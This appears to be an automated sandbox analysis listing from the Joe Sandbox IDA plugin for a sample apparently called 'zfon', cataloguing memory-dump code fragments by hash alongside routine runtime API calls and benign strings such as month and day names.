                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                            • Opcode ID: 603fe3ad4fecd5e6127da2d279c75e658a97bcbc96e57b625571bb65e3e10dd9
                                                                                                                                                                            • Instruction ID: 20d0b1ad2e9d382ad1880e001a38724a4db082603c03d7d55004a3c32b6e1ce6
                                                                                                                                                                            • Opcode Fuzzy Hash: 603fe3ad4fecd5e6127da2d279c75e658a97bcbc96e57b625571bb65e3e10dd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 67115EB6619B4182EB608F25F48426A77E9FB88B84F589234DF8C17B68DF3CC551CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __std_exception_copyrand_s
                                                                                                                                                                            • String ID: invalid random_device value
                                                                                                                                                                            • API String ID: 979846984-3926945683
                                                                                                                                                                            • Opcode ID: 1f8ed5a527de385152b09c5ece5034331ea420588227d0af696af0a8ee27bb76
                                                                                                                                                                            • Instruction ID: 8ac8e88d6e772f754b488bbd50bd33746eb560aa3ebba3301015a2cb53126b77
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f8ed5a527de385152b09c5ece5034331ea420588227d0af696af0a8ee27bb76
                                                                                                                                                                            • Instruction Fuzzy Hash: DBF090B9A18A05C1EB089F75E8900AA73A0FF9CF40F846032EA4D87755DF3CE5A5CB10
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrow__std_exception_copystd::invalid_argument::invalid_argument
                                                                                                                                                                            • String ID: bad function call
                                                                                                                                                                            • API String ID: 1180758849-3612616537
                                                                                                                                                                            • Opcode ID: e7b691aa0131a1abb8dcc5df0449dfc66b02b47a65c773ff1f5cad3373210a14
                                                                                                                                                                            • Instruction ID: 2f0eb9c9b7f30f69bebe6fd5dd1aee80021b0b8df44a16c84a299bc67de3664e
                                                                                                                                                                            • Opcode Fuzzy Hash: e7b691aa0131a1abb8dcc5df0449dfc66b02b47a65c773ff1f5cad3373210a14
                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED0C9A6A28946A5EF10EF34D9510EB6331BF94384FD02172E25D6657AEE1CE219CB10
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B16E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBC1B129EE), ref: 00007FFBC1B16E56
                                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B1F48A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate
                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                            • API String ID: 661698970-629598281
                                                                                                                                                                            • Opcode ID: 89070a3729e3cdc045543aa2d9e9ff952cd9e076b18af429ec74a74252da6a16
                                                                                                                                                                            • Instruction ID: a232671e027f187f9e27c8a11e7369918c97ec1aa519ebf588080dff73dba0ff
                                                                                                                                                                            • Opcode Fuzzy Hash: 89070a3729e3cdc045543aa2d9e9ff952cd9e076b18af429ec74a74252da6a16
                                                                                                                                                                            • Instruction Fuzzy Hash: 86E065BAD0825281E7606F31F18023E27A4FF4DB54F36A1B8DB881664ACE3CD495CB01
                                                                                                                                                                            APIs
                                                                                                                                                                            • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B3D45D
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B739
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B768
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: memcpy.VCRUNTIME140(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B77F
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B3D47A
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFBC1B3D485
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Getmonthsmallocmemcpy
                                                                                                                                                                            • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece
                                                                                                                                                                            • API String ID: 1628830074-2030377133
                                                                                                                                                                            • Opcode ID: c82f8f9ad4e2d2af623f2a64a55ac3353b2c765cd361e64e07e7ab3c08dd46ed
                                                                                                                                                                            • Instruction ID: 017c7eb5c069659e5c24609b72f8398f3a74b402231601f3ae69707839a5cd01
                                                                                                                                                                            • Opcode Fuzzy Hash: c82f8f9ad4e2d2af623f2a64a55ac3353b2c765cd361e64e07e7ab3c08dd46ed
                                                                                                                                                                            • Instruction Fuzzy Hash: F6E0ED6AB15B4292EF409F62F59436A6360FF48B94F886034DA0E17B55DF3CE4B4CB10
                                                                                                                                                                            APIs
                                                                                                                                                                            • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B3D40D
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B739
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B768
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: memcpy.VCRUNTIME140(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B77F
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B3D42A
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B3D435
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Getdaysmallocmemcpy
                                                                                                                                                                            • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1347072587-3283725177
                                                                                                                                                                            • Opcode ID: 35240cb5f5100ad4a6dbdd5295e329d3b5d0df92d6cb6440ee87cb48881eb460
                                                                                                                                                                            • Instruction ID: fadabd17fb668c4a3f47f058afdf88376b70129efdb6881212cf921f4a55076f
                                                                                                                                                                            • Opcode Fuzzy Hash: 35240cb5f5100ad4a6dbdd5295e329d3b5d0df92d6cb6440ee87cb48881eb460
                                                                                                                                                                            • Instruction Fuzzy Hash: 74E0ED69A14B4292EF159F22F59436A6360EF4CB94F886134DA0D17B55EF3CE4B4CB20
                                                                                                                                                                            APIs
                                                                                                                                                                            • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B3CD4D
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B3CD6A
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFBC1B3CD75
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Getmonthsmallocmemcpy
                                                                                                                                                                            • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                                                                                                                            • API String ID: 1628830074-4232081075
                                                                                                                                                                            • Opcode ID: db95abb9d15dbef39e6ee0859203eea4f630d3aba3162c7ecd3a84709e9a22e3
                                                                                                                                                                            • Instruction ID: a516d3c8c6d76346975731d27ae36979aba54e3292ddc6e8cb9b5e79ff96b77f
                                                                                                                                                                            • Opcode Fuzzy Hash: db95abb9d15dbef39e6ee0859203eea4f630d3aba3162c7ecd3a84709e9a22e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 19E0C969A14B4292EF009F62F59826A6360EF58B90F946035DA0E16756DF3CE4E4CB50
                                                                                                                                                                            APIs
                                                                                                                                                                            • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B3CCDD
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B3CCFA
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B3CD05
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Getdaysmallocmemcpy
                                                                                                                                                                            • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1347072587-3283725177
                                                                                                                                                                            • Opcode ID: 4369f42fca7dce3118de04e163d293b9be384bdf3f2632a8f01c906decda58a8
                                                                                                                                                                            • Instruction ID: a2a9badbb009ba67c38e60d85cfed28a06f168839b7c983418294dbff2a79ee6
                                                                                                                                                                            • Opcode Fuzzy Hash: 4369f42fca7dce3118de04e163d293b9be384bdf3f2632a8f01c906decda58a8
                                                                                                                                                                            • Instruction Fuzzy Hash: EAE06555614B4292EF048F22F5443666360FF08B80F845435DA1D43755DF3CE4A4C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                            • API String ID: 932687459-410509341
                                                                                                                                                                            • Opcode ID: bc4d1c003b6ff2fe4e2c4e9266720bee0507f32f91a828decfd6544b21c815df
                                                                                                                                                                            • Instruction ID: d1c7cd60a729f1af9c43b258b481b815e3afd20fdd8fefd0a2f5be55caa04b27
                                                                                                                                                                            • Opcode Fuzzy Hash: bc4d1c003b6ff2fe4e2c4e9266720bee0507f32f91a828decfd6544b21c815df
                                                                                                                                                                            • Instruction Fuzzy Hash: B2D06762A1D98691EE20FF28E8953A9E330FB94708FD04471D18D46675EF6CDA46C750
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFBC1B16CE9,?,?,?,?,00007FFBC1B205B2,?,?,?,?,?), ref: 00007FFBC1B16E83
                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FFBC1B16CE9,?,?,?,?,00007FFBC1B205B2,?,?,?,?,?), ref: 00007FFBC1B16F0C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                                                                                                            • Instruction ID: dc15159058d2986fbdcec76c8f705245327761fa83c4604d85815c6504e97ea6
                                                                                                                                                                            • Opcode Fuzzy Hash: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                                                                                                            • Instruction Fuzzy Hash: AC1163A8E0964382FB149F35D8546772391AF487A1F256634DD2E273D5DE2CA4478E10
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFBC1B03325,?,?,?,?,00007FFBC1B041CA,?,?,?,?,?), ref: 00007FFBC1B03483
                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FFBC1B03325,?,?,?,?,00007FFBC1B041CA,?,?,?,?,?), ref: 00007FFBC1B0350B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 868a6d6a1edc03e792c9974cc9c9f69a97d5c8a62993b42da19d3e438dcd092c
                                                                                                                                                                            • Instruction ID: c46c007699ca8109dbf46b78089d6e303300d07cd5700540074c38ff7816bbd4
                                                                                                                                                                            • Opcode Fuzzy Hash: 868a6d6a1edc03e792c9974cc9c9f69a97d5c8a62993b42da19d3e438dcd092c
                                                                                                                                                                            • Instruction Fuzzy Hash: 101124ECE1960285EB549F36E8D813A2759AF487A0F14A634D92E277F5EF2CE4518F00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: 21e29c9922f19bdda75fb578db1eebbd38709f35706a816a21095b56aee0f4f3
                                                                                                                                                                            • Instruction ID: efb1d10032b5f49804bac3fe72210139754802fae7ef59000c69198da88baa7d
                                                                                                                                                                            • Opcode Fuzzy Hash: 21e29c9922f19bdda75fb578db1eebbd38709f35706a816a21095b56aee0f4f3
                                                                                                                                                                            • Instruction Fuzzy Hash: B1F0376AA18F0286EB449F26E9A427A2320FB8CF90F005071CA4D53B31DF2CE4A5CB10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: 2301427b651c3a47193e5a8d6ad951242187ad620a5bd31deb8cfb3ac87ac41d
                                                                                                                                                                            • Instruction ID: a7b7a5a855b387bd2a3626354849add95d3ef5db5d3e120a184ae6b3bafcd694
